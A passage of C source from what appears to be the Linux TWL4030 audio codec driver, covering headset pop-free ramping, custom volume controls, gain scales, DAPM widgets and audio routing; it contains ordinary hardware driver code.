twl4030_apll_enable(component, 0); break; } return 0; } static void headset_ramp(struct snd_soc_component *component, int ramp) { unsigned char hs_gain, hs_pop; struct twl4030_priv *twl4030 = 
snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; /* Base values for ramp delay calculation: 2^19 - 2^26 */ unsigned int ramp_base[] = {524288, 1048576, 2097152, 4194304, 8388608, 16777216, 33554432, 67108864}; unsigned int delay; hs_gain = twl4030_read(component, TWL4030_REG_HS_GAIN_SET); hs_pop = twl4030_read(component, TWL4030_REG_HS_POPN_SET); delay = (ramp_base[(hs_pop & TWL4030_RAMP_DELAY) >> 2] / twl4030->sysclk) + 1; /* Enable external mute control, this dramatically reduces * the pop-noise */ if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { gpio_set_value(pdata->hs_extmute_gpio, 1); } else { hs_pop |= TWL4030_EXTMUTE; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } } if (ramp) { /* Headset ramp-up according to the TRM */ hs_pop |= TWL4030_VMID_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Actually write to the register */ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, hs_gain, TWL4030_REG_HS_GAIN_SET); hs_pop |= TWL4030_RAMP_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Wait ramp delay time + 1, so the VMID can settle */ twl4030_wait_ms(delay); } else { /* Headset ramp-down _not_ according to * the TRM, but in a way that it is working */ hs_pop &= ~TWL4030_RAMP_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Wait ramp delay time + 1, so the VMID can settle */ twl4030_wait_ms(delay); /* Bypass the reg_cache to mute the headset */ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, hs_gain & (~0x0f), TWL4030_REG_HS_GAIN_SET); hs_pop &= ~TWL4030_VMID_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } /* Disable external mute */ if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { gpio_set_value(pdata->hs_extmute_gpio, 0); } else { hs_pop &= ~TWL4030_EXTMUTE; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } } } static int headsetlpga_event(struct snd_soc_dapm_widget *w, struct 
snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); switch (event) { case SND_SOC_DAPM_POST_PMU: /* Do the ramp-up only once */ if (!twl4030->hsr_enabled) headset_ramp(component, 1); twl4030->hsl_enabled = 1; break; case SND_SOC_DAPM_POST_PMD: /* Do the ramp-down only if both headsetL/R is disabled */ if (!twl4030->hsr_enabled) headset_ramp(component, 0); twl4030->hsl_enabled = 0; break; } return 0; } static int headsetrpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); switch (event) { case SND_SOC_DAPM_POST_PMU: /* Do the ramp-up only once */ if (!twl4030->hsl_enabled) headset_ramp(component, 1); twl4030->hsr_enabled = 1; break; case SND_SOC_DAPM_POST_PMD: /* Do the ramp-down only if both headsetL/R is disabled */ if (!twl4030->hsl_enabled) headset_ramp(component, 0); twl4030->hsr_enabled = 0; break; } return 0; } static int digimic_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; if (pdata && pdata->digimic_delay) twl4030_wait_ms(pdata->digimic_delay); return 0; } /* * Some of the gain controls in TWL (mostly those which are associated with * the outputs) are implemented in an interesting way: * 0x0 : Power down (mute) * 0x1 : 6dB * 0x2 : 0 dB * 0x3 : -6 dB * Inverting not going to help with these. * Custom volsw and volsw_2r get/put functions to handle these gain bits. 
*/ static int snd_soc_get_volsw_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int shift = mc->shift; unsigned int rshift = mc->rshift; int max = mc->max; int mask = (1 << fls(max)) - 1; ucontrol->value.integer.value[0] = (twl4030_read(component, reg) >> shift) & mask; if (ucontrol->value.integer.value[0]) ucontrol->value.integer.value[0] = max + 1 - ucontrol->value.integer.value[0]; if (shift != rshift) { ucontrol->value.integer.value[1] = (twl4030_read(component, reg) >> rshift) & mask; if (ucontrol->value.integer.value[1]) ucontrol->value.integer.value[1] = max + 1 - ucontrol->value.integer.value[1]; } return 0; } static int snd_soc_put_volsw_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int shift = mc->shift; unsigned int rshift = mc->rshift; int max = mc->max; int mask = (1 << fls(max)) - 1; unsigned short val, val2, val_mask; val = (ucontrol->value.integer.value[0] & mask); val_mask = mask << shift; if (val) val = max + 1 - val; val = val << shift; if (shift != rshift) { val2 = (ucontrol->value.integer.value[1] & mask); val_mask |= mask << rshift; if (val2) val2 = max + 1 - val2; val |= val2 << rshift; } return snd_soc_component_update_bits(component, reg, val_mask, val); } static int snd_soc_get_volsw_r2_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int reg2 = mc->rreg; unsigned int 
shift = mc->shift; int max = mc->max; int mask = (1<<fls(max))-1; ucontrol->value.integer.value[0] = (twl4030_read(component, reg) >> shift) & mask; ucontrol->value.integer.value[1] = (twl4030_read(component, reg2) >> shift) & mask; if (ucontrol->value.integer.value[0]) ucontrol->value.integer.value[0] = max + 1 - ucontrol->value.integer.value[0]; if (ucontrol->value.integer.value[1]) ucontrol->value.integer.value[1] = max + 1 - ucontrol->value.integer.value[1]; return 0; } static int snd_soc_put_volsw_r2_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int reg2 = mc->rreg; unsigned int shift = mc->shift; int max = mc->max; int mask = (1 << fls(max)) - 1; int err; unsigned short val, val2, val_mask; val_mask = mask << shift; val = (ucontrol->value.integer.value[0] & mask); val2 = (ucontrol->value.integer.value[1] & mask); if (val) val = max + 1 - val; if (val2) val2 = max + 1 - val2; val = val << shift; val2 = val2 << shift; err = snd_soc_component_update_bits(component, reg, val_mask, val); if (err < 0) return err; err = snd_soc_component_update_bits(component, reg2, val_mask, val2); return err; } /* Codec operation modes */ static const char *twl4030_op_modes_texts[] = { "Option 2 (voice/audio)", "Option 1 (audio)" }; static SOC_ENUM_SINGLE_DECL(twl4030_op_modes_enum, TWL4030_REG_CODEC_MODE, 0, twl4030_op_modes_texts); static int snd_soc_put_twl4030_opmode_enum_double(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (twl4030->configured) { dev_err(component->dev, "operation mode cannot be changed on-the-fly\n"); return -EBUSY; } return snd_soc_put_enum_double(kcontrol, 
ucontrol); } /* * FGAIN volume control: * from -62 to 0 dB in 1 dB steps (mute instead of -63 dB) */ static DECLARE_TLV_DB_SCALE(digital_fine_tlv, -6300, 100, 1); /* * CGAIN volume control: * 0 dB to 12 dB in 6 dB steps * value 2 and 3 means 12 dB */ static DECLARE_TLV_DB_SCALE(digital_coarse_tlv, 0, 600, 0); /* * Voice Downlink GAIN volume control: * from -37 to 12 dB in 1 dB steps (mute instead of -37 dB) */ static DECLARE_TLV_DB_SCALE(digital_voice_downlink_tlv, -3700, 100, 1); /* * Analog playback gain * -24 dB to 12 dB in 2 dB steps */ static DECLARE_TLV_DB_SCALE(analog_tlv, -2400, 200, 0); /* * Gain controls tied to outputs * -6 dB to 6 dB in 6 dB steps (mute instead of -12) */ static DECLARE_TLV_DB_SCALE(output_tvl, -1200, 600, 1); /* * Gain control for earpiece amplifier * 0 dB to 12 dB in 6 dB steps (mute instead of -6) */ static DECLARE_TLV_DB_SCALE(output_ear_tvl, -600, 600, 1); /* * Capture gain after the ADCs * from 0 dB to 31 dB in 1 dB steps */ static DECLARE_TLV_DB_SCALE(digital_capture_tlv, 0, 100, 0); /* * Gain control for input amplifiers * 0 dB to 30 dB in 6 dB steps */ static DECLARE_TLV_DB_SCALE(input_gain_tlv, 0, 600, 0); /* AVADC clock priority */ static const char *twl4030_avadc_clk_priority_texts[] = { "Voice high priority", "HiFi high priority" }; static SOC_ENUM_SINGLE_DECL(twl4030_avadc_clk_priority_enum, TWL4030_REG_AVADC_CTL, 2, twl4030_avadc_clk_priority_texts); static const char *twl4030_rampdelay_texts[] = { "27/20/14 ms", "55/40/27 ms", "109/81/55 ms", "218/161/109 ms", "437/323/218 ms", "874/645/437 ms", "1748/1291/874 ms", "3495/2581/1748 ms" }; static SOC_ENUM_SINGLE_DECL(twl4030_rampdelay_enum, TWL4030_REG_HS_POPN_SET, 2, twl4030_rampdelay_texts); /* Vibra H-bridge direction mode */ static const char *twl4030_vibradirmode_texts[] = { "Vibra H-bridge direction", "Audio data MSB", }; static SOC_ENUM_SINGLE_DECL(twl4030_vibradirmode_enum, TWL4030_REG_VIBRA_CTL, 5, twl4030_vibradirmode_texts); /* Vibra H-bridge direction */ static 
const char *twl4030_vibradir_texts[] = { "Positive polarity", "Negative polarity", }; static SOC_ENUM_SINGLE_DECL(twl4030_vibradir_enum, TWL4030_REG_VIBRA_CTL, 1, twl4030_vibradir_texts); /* Digimic Left and right swapping */ static const char *twl4030_digimicswap_texts[] = { "Not swapped", "Swapped", }; static SOC_ENUM_SINGLE_DECL(twl4030_digimicswap_enum, TWL4030_REG_MISC_SET_1, 0, twl4030_digimicswap_texts); static const struct snd_kcontrol_new twl4030_snd_controls[] = { /* Codec operation mode control */ SOC_ENUM_EXT("Codec Operation Mode", twl4030_op_modes_enum, snd_soc_get_enum_double, snd_soc_put_twl4030_opmode_enum_double), /* Common playback gain controls */ SOC_DOUBLE_R_TLV("DAC1 Digital Fine Playback Volume", TWL4030_REG_ARXL1PGA, TWL4030_REG_ARXR1PGA, 0, 0x3f, 0, digital_fine_tlv), SOC_DOUBLE_R_TLV("DAC2 Digital Fine Playback Volume", TWL4030_REG_ARXL2PGA, TWL4030_REG_ARXR2PGA, 0, 0x3f, 0, digital_fine_tlv), SOC_DOUBLE_R_TLV("DAC1 Digital Coarse Playback Volume", TWL4030_REG_ARXL1PGA, TWL4030_REG_ARXR1PGA, 6, 0x2, 0, digital_coarse_tlv), SOC_DOUBLE_R_TLV("DAC2 Digital Coarse Playback Volume", TWL4030_REG_ARXL2PGA, TWL4030_REG_ARXR2PGA, 6, 0x2, 0, digital_coarse_tlv), SOC_DOUBLE_R_TLV("DAC1 Analog Playback Volume", TWL4030_REG_ARXL1_APGA_CTL, TWL4030_REG_ARXR1_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_DOUBLE_R_TLV("DAC2 Analog Playback Volume", TWL4030_REG_ARXL2_APGA_CTL, TWL4030_REG_ARXR2_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_DOUBLE_R("DAC1 Analog Playback Switch", TWL4030_REG_ARXL1_APGA_CTL, TWL4030_REG_ARXR1_APGA_CTL, 1, 1, 0), SOC_DOUBLE_R("DAC2 Analog Playback Switch", TWL4030_REG_ARXL2_APGA_CTL, TWL4030_REG_ARXR2_APGA_CTL, 1, 1, 0), /* Common voice downlink gain controls */ SOC_SINGLE_TLV("DAC Voice Digital Downlink Volume", TWL4030_REG_VRXPGA, 0, 0x31, 0, digital_voice_downlink_tlv), SOC_SINGLE_TLV("DAC Voice Analog Downlink Volume", TWL4030_REG_VDL_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_SINGLE("DAC Voice Analog Downlink Switch", 
TWL4030_REG_VDL_APGA_CTL, 1, 1, 0), /* Separate output gain controls */ SOC_DOUBLE_R_EXT_TLV("PreDriv Playback Volume", TWL4030_REG_PREDL_CTL, TWL4030_REG_PREDR_CTL, 4, 3, 0, snd_soc_get_volsw_r2_twl4030, snd_soc_put_volsw_r2_twl4030, output_tvl), SOC_DOUBLE_EXT_TLV("Headset Playback Volume", TWL4030_REG_HS_GAIN_SET, 0, 2, 3, 0, snd_soc_get_volsw_twl4030, snd_soc_put_volsw_twl4030, output_tvl), SOC_DOUBLE_R_EXT_TLV("Carkit Playback Volume", TWL4030_REG_PRECKL_CTL, TWL4030_REG_PRECKR_CTL, 4, 3, 0, snd_soc_get_volsw_r2_twl4030, snd_soc_put_volsw_r2_twl4030, output_tvl), SOC_SINGLE_EXT_TLV("Earpiece Playback Volume", TWL4030_REG_EAR_CTL, 4, 3, 0, snd_soc_get_volsw_twl4030, snd_soc_put_volsw_twl4030, output_ear_tvl), /* Common capture gain controls */ SOC_DOUBLE_R_TLV("TX1 Digital Capture Volume", TWL4030_REG_ATXL1PGA, TWL4030_REG_ATXR1PGA, 0, 0x1f, 0, digital_capture_tlv), SOC_DOUBLE_R_TLV("TX2 Digital Capture Volume", TWL4030_REG_AVTXL2PGA, TWL4030_REG_AVTXR2PGA, 0, 0x1f, 0, digital_capture_tlv), SOC_DOUBLE_TLV("Analog Capture Volume", TWL4030_REG_ANAMIC_GAIN, 0, 3, 5, 0, input_gain_tlv), SOC_ENUM("AVADC Clock Priority", twl4030_avadc_clk_priority_enum), SOC_ENUM("HS ramp delay", twl4030_rampdelay_enum), SOC_ENUM("Vibra H-bridge mode", twl4030_vibradirmode_enum), SOC_ENUM("Vibra H-bridge direction", twl4030_vibradir_enum), SOC_ENUM("Digimic LR Swap", twl4030_digimicswap_enum), }; static const struct snd_soc_dapm_widget twl4030_dapm_widgets[] = { /* Left channel inputs */ SND_SOC_DAPM_INPUT("MAINMIC"), SND_SOC_DAPM_INPUT("HSMIC"), SND_SOC_DAPM_INPUT("AUXL"), SND_SOC_DAPM_INPUT("CARKITMIC"), /* Right channel inputs */ SND_SOC_DAPM_INPUT("SUBMIC"), SND_SOC_DAPM_INPUT("AUXR"), /* Digital microphones (Stereo) */ SND_SOC_DAPM_INPUT("DIGIMIC0"), SND_SOC_DAPM_INPUT("DIGIMIC1"), /* Outputs */ SND_SOC_DAPM_OUTPUT("EARPIECE"), SND_SOC_DAPM_OUTPUT("PREDRIVEL"), SND_SOC_DAPM_OUTPUT("PREDRIVER"), SND_SOC_DAPM_OUTPUT("HSOL"), SND_SOC_DAPM_OUTPUT("HSOR"), 
SND_SOC_DAPM_OUTPUT("CARKITL"), SND_SOC_DAPM_OUTPUT("CARKITR"), SND_SOC_DAPM_OUTPUT("HFL"), SND_SOC_DAPM_OUTPUT("HFR"), SND_SOC_DAPM_OUTPUT("VIBRA"), /* AIF and APLL clocks for running DAIs (including loopback) */ SND_SOC_DAPM_OUTPUT("Virtual HiFi OUT"), SND_SOC_DAPM_INPUT("Virtual HiFi IN"), SND_SOC_DAPM_OUTPUT("Virtual Voice OUT"), /* DACs */ SND_SOC_DAPM_DAC("DAC Right1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Left1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Right2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Left2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Voice", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_AIF_IN("VAIFIN", "Voice Playback", 0, TWL4030_REG_VOICE_IF, 6, 0), /* Analog bypasses */ SND_SOC_DAPM_SWITCH("Right1 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassr1_control), SND_SOC_DAPM_SWITCH("Left1 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassl1_control), SND_SOC_DAPM_SWITCH("Right2 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassr2_control), SND_SOC_DAPM_SWITCH("Left2 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassl2_control), SND_SOC_DAPM_SWITCH("Voice Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassv_control), /* Master analog loopback switch */ SND_SOC_DAPM_SUPPLY("FM Loop Enable", TWL4030_REG_MISC_SET_1, 5, 0, NULL, 0), /* Digital bypasses */ SND_SOC_DAPM_SWITCH("Left Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassl_control), SND_SOC_DAPM_SWITCH("Right Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassr_control), SND_SOC_DAPM_SWITCH("Voice Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassv_control), /* Digital mixers, power control for the physical DACs */ SND_SOC_DAPM_MIXER("Digital R1 Playback Mixer", TWL4030_REG_AVDAC_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital L1 Playback Mixer", TWL4030_REG_AVDAC_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital R2 Playback Mixer", TWL4030_REG_AVDAC_CTL, 2, 0, NULL, 0), 
SND_SOC_DAPM_MIXER("Digital L2 Playback Mixer", TWL4030_REG_AVDAC_CTL, 3, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital Voice Playback Mixer", TWL4030_REG_AVDAC_CTL, 4, 0, NULL, 0), /* Analog mixers, power control for the physical PGAs */ SND_SOC_DAPM_MIXER("Analog R1 Playback Mixer", TWL4030_REG_ARXR1_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog L1 Playback Mixer", TWL4030_REG_ARXL1_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog R2 Playback Mixer", TWL4030_REG_ARXR2_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog L2 Playback Mixer", TWL4030_REG_ARXL2_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog Voice Playback Mixer", TWL4030_REG_VDL_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("APLL Enable", SND_SOC_NOPM, 0, 0, apll_event, SND_SOC_DAPM_PRE_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_SUPPLY("AIF Enable", SND_SOC_NOPM, 0, 0, aif_event, SND_SOC_DAPM_PRE_PMU|SND_SOC_DAPM_POST_PMD), /* Output MIXER controls */ /* Earpiece */ SND_SOC_DAPM_MIXER("Earpiece Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_earpiece_controls[0], ARRAY_SIZE(twl4030_dapm_earpiece_controls)), SND_SOC_DAPM_PGA_E("Earpiece PGA", SND_SOC_NOPM, 0, 0, NULL, 0, earpiecepga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* PreDrivL/R */ SND_SOC_DAPM_MIXER("PredriveL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_predrivel_controls[0], ARRAY_SIZE(twl4030_dapm_predrivel_controls)), SND_SOC_DAPM_PGA_E("PredriveL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, predrivelpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("PredriveR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_predriver_controls[0], ARRAY_SIZE(twl4030_dapm_predriver_controls)), SND_SOC_DAPM_PGA_E("PredriveR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, predriverpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* HeadsetL/R */ SND_SOC_DAPM_MIXER("HeadsetL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_hsol_controls[0], ARRAY_SIZE(twl4030_dapm_hsol_controls)), SND_SOC_DAPM_PGA_E("HeadsetL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, 
headsetlpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("HeadsetR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_hsor_controls[0], ARRAY_SIZE(twl4030_dapm_hsor_controls)), SND_SOC_DAPM_PGA_E("HeadsetR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, headsetrpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* CarkitL/R */ SND_SOC_DAPM_MIXER("CarkitL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_carkitl_controls[0], ARRAY_SIZE(twl4030_dapm_carkitl_controls)), SND_SOC_DAPM_PGA_E("CarkitL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, carkitlpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("CarkitR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_carkitr_controls[0], ARRAY_SIZE(twl4030_dapm_carkitr_controls)), SND_SOC_DAPM_PGA_E("CarkitR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, carkitrpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* Output MUX controls */ /* HandsfreeL/R */ SND_SOC_DAPM_MUX("HandsfreeL Mux", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreel_control), SND_SOC_DAPM_SWITCH("HandsfreeL", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreelmute_control), SND_SOC_DAPM_PGA_E("HandsfreeL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, handsfreelpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MUX("HandsfreeR Mux", SND_SOC_NOPM, 5, 0, &twl4030_dapm_handsfreer_control), SND_SOC_DAPM_SWITCH("HandsfreeR", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreermute_control), SND_SOC_DAPM_PGA_E("HandsfreeR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, handsfreerpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* Vibra */ SND_SOC_DAPM_MUX_E("Vibra Mux", TWL4030_REG_VIBRA_CTL, 0, 0, &twl4030_dapm_vibra_control, vibramux_event, SND_SOC_DAPM_PRE_PMU), SND_SOC_DAPM_MUX("Vibra Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_vibrapath_control), /* Introducing four virtual ADC, since TWL4030 have four channel for capture */ SND_SOC_DAPM_ADC("ADC Virtual Left1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_ADC("ADC Virtual Right1", NULL, SND_SOC_NOPM, 0, 0), 
SND_SOC_DAPM_ADC("ADC Virtual Left2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_ADC("ADC Virtual Right2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_AIF_OUT("VAIFOUT", "Voice Capture", 0, TWL4030_REG_VOICE_IF, 5, 0), /* Analog/Digital mic path selection. TX1 Left/Right: either analog Left/Right or Digimic0 TX2 Left/Right: either analog Left/Right or Digimic1 */ SND_SOC_DAPM_MUX("TX1 Capture Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_micpathtx1_control), SND_SOC_DAPM_MUX("TX2 Capture Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_micpathtx2_control), /* Analog input mixers for the capture amplifiers */ SND_SOC_DAPM_MIXER("Analog Left", TWL4030_REG_ANAMICL, 4, 0, &twl4030_dapm_analoglmic_controls[0], ARRAY_SIZE(twl4030_dapm_analoglmic_controls)), SND_SOC_DAPM_MIXER("Analog Right", TWL4030_REG_ANAMICR, 4, 0, &twl4030_dapm_analogrmic_controls[0], ARRAY_SIZE(twl4030_dapm_analogrmic_controls)), SND_SOC_DAPM_PGA("ADC Physical Left", TWL4030_REG_AVADC_CTL, 3, 0, NULL, 0), SND_SOC_DAPM_PGA("ADC Physical Right", TWL4030_REG_AVADC_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_PGA_E("Digimic0 Enable", TWL4030_REG_ADCMICSEL, 1, 0, NULL, 0, digimic_event, SND_SOC_DAPM_POST_PMU), SND_SOC_DAPM_PGA_E("Digimic1 Enable", TWL4030_REG_ADCMICSEL, 3, 0, NULL, 0, digimic_event, SND_SOC_DAPM_POST_PMU), SND_SOC_DAPM_SUPPLY("micbias1 select", TWL4030_REG_MICBIAS_CTL, 5, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("micbias2 select", TWL4030_REG_MICBIAS_CTL, 6, 0, NULL, 0), /* Microphone bias */ SND_SOC_DAPM_SUPPLY("Mic Bias 1", TWL4030_REG_MICBIAS_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("Mic Bias 2", TWL4030_REG_MICBIAS_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("Headset Mic Bias", TWL4030_REG_MICBIAS_CTL, 2, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("VIF Enable", TWL4030_REG_VOICE_IF, 0, 0, NULL, 0), }; static const struct snd_soc_dapm_route intercon[] = { /* Stream -> DAC mapping */ {"DAC Right1", NULL, "HiFi Playback"}, {"DAC Left1", NULL, "HiFi Playback"}, {"DAC Right2", NULL, "HiFi Playback"}, {"DAC Left2", NULL, "HiFi Playback"}, 
{"DAC Voice", NULL, "VAIFIN"}, /* ADC -> Stream mapping */ {"HiFi Capture", NULL, "ADC Virtual Left1"}, {"HiFi Capture", NULL, "ADC Virtual Right1"}, {"HiFi Capture", NULL, "ADC Virtual Left2"}, {"HiFi Capture", NULL, "ADC Virtual Right2"}, {"VAIFOUT", NULL, "ADC Virtual Left2"}, {"VAIFOUT", NULL, "ADC Virtual Right2"}, {"VAIFOUT", NULL, "VIF Enable"}, {"Digital L1 Playback Mixer", NULL, "DAC Left1"}, {"Digital R1 Playback Mixer", NULL, "DAC Right1"}, {"Digital L2 Playback Mixer", NULL, "DAC Left2"}, {"Digital R2 Playback Mixer", NULL, "DAC Right2"}, {"Digital Voice Playback Mixer", NULL, "DAC Voice"}, /* Supply for the digital part (APLL) */ {"Digital Voice Playback Mixer", NULL, "APLL Enable"}, {"DAC Left1", NULL, "AIF Enable"}, {"DAC Right1", NULL, "AIF Enable"}, {"DAC Left2", NULL, "AIF Enable"}, {"DAC Right1", NULL, "AIF Enable"}, {"DAC Voice", NULL, "VIF Enable"}, {"Digital R2 Playback Mixer", NULL, "AIF Enable"}, {"Digital L2 Playback Mixer", NULL, "AIF Enable"}, {"Analog L1 Playback Mixer", NULL, "Digital L1 Playback Mixer"}, {"Analog R1 Playback Mixer", NULL, "Digital R1 Playback Mixer"}, {"Analog L2 Playback Mixer", NULL, "Digital L2 Playback Mixer"}, {"Analog R2 Playback Mixer", NULL, "Digital R2 Playback Mixer"}, {"Analog Voice Playback Mixer", NULL, "Digital Voice Playback Mixer"}, /* Internal playback routings */ /* Earpiece */ {"Earpiece Mixer", "Voice", "Analog Voice Playback Mixer"}, {"Earpiece Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"Earpiece Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"Earpiece Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"Earpiece PGA", NULL, "Earpiece Mixer"}, /* PreDrivL */ {"PredriveL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"PredriveL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"PredriveL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"PredriveL Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"PredriveL PGA", NULL, "PredriveL Mixer"}, /* PreDrivR */ {"PredriveR Mixer", "Voice", "Analog 
Voice Playback Mixer"}, {"PredriveR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"PredriveR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"PredriveR Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"PredriveR PGA", NULL, "PredriveR Mixer"}, /* HeadsetL */ {"HeadsetL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"HeadsetL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"HeadsetL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"HeadsetL PGA", NULL, "HeadsetL Mixer"}, /* HeadsetR */ {"HeadsetR Mixer", "Voice", "Analog Voice Playback Mixer"}, {"HeadsetR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"HeadsetR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"HeadsetR PGA", NULL, "HeadsetR Mixer"}, /* CarkitL */ {"CarkitL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"CarkitL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"CarkitL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"CarkitL PGA", NULL, "CarkitL 